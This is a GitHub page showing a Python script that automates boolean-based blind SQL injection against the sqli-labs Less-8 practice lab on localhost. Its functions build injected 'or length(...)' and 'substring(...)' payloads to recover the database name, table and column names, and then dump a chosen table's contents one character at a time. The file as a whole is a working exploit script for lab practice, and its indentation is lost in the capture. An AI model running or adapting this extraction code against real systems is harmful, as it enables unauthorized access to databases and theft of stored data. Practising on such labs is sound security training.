-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathblind_based-8.py
145 lines (123 loc) · 4.63 KB
/
blind_based-8.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
url="http://localhost/sqli-labs-php7/Less-8/"
import string
import requests
def dblength():
for i in range (1,100):
payload=url+"?id=-1'or length(database())="+str(i)+"-- -"
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
length=i
break
return length
print(i)
print(payload)
def dbname(length):
s=""
for j in range(1,length+1):
for k in string.printable:
payload=url+"?id=-1'or substring(database(),1,"+str(j)+")="+"'"+s+k+"'"+"-- -"
print(payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
s=s+k
break
return s
def tablelen():
for i in range(1,100):
payload=url+"?id=-1' or length((select group_concat(table_name)from information_schema.tables where table_schema="+"'"+database_name+"'"+"))="+str(i)+"-- -"
print (payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
break
table_length=i
return table_length
def table_details():
s=""
for i in range(1,table_length+1):
for j in string.printable:
payload=url+"?id=-1' or substring((select group_concat(table_name)from information_schema.tables where table_schema="+"'"+database_name+"'),1,"+str(i)+")='"+s+j+"'"+"-- -"
print(payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
s=s+j
break
print(s)
return s
def column_length():
columns_length=[]
l=len(table_names)
for i in range(l):
for j in range(100):
payload=url+"?id=-1' or length((select group_concat(column_name)from information_schema.columns where table_name="+"'"+table_names[i]+"'"+"))="+str(j)+"-- -"
print(payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
columns_length.append(j)
break
return columns_length
def column_names():
columns_name=[]
s=""
for i in range(len(table_names)):
s=""
for j in range(1,columns_length[i]+1):
for k in string.printable:
payload=url+"?id=-1' or substring((select group_concat(column_name)from information_schema.columns where table_name="+"'"+table_names[i]+"'),1,"+str(j)+")='"+s+k+"'"+"-- -"
print(payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
s=s+k
break
columns_name.append(s)
return columns_name
def info_data():
info_length=[]
data_dumb=[]
n=int(input("input the number of table to dump"))
singe_column=[]
single_column=columns_name[n].split(",")
for i in range(len(single_column)):
for j in range(1,1000):
payload=url+"?id=-1' or length((select group_concat("+single_column[i]+") from "+table_names[n]+"))="+str(j)+"-- -"
print(payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
info_length.append(j)
break
for k in range(len(info_length)):
s=""
for l in range(1,info_length[k]+1):
for m in string.printable:
payload=url+"?id=-1' or substring((select group_concat("+single_column[k]+")from "+table_names[n]+"),1,"+str(l)+")='"+s+m+"'-- -"
print(payload)
r=requests.get(payload)
response=r.content.decode('utf-8')
if "You are in..........." in response:
s=s+m
break
data_dumb.append(s)
return (data_dumb,info_length)
length=dblength()
database_name=dbname(length)
table_length=tablelen()
table_names=[]
table_names=table_details().split(",")
columns_length=column_length()
columns_name=column_names()
print("table name found",table_names)
data_dumb,info_length=info_data()
print("database length found",length)
print("database name found",database_name)
print("table length found",table_length)
print("tables name found",table_names)
print("column lengths found",columns_length)
print("column name found",columns_name)
print("data length found for given table",info_length)
print("data found from given table",data_dumb)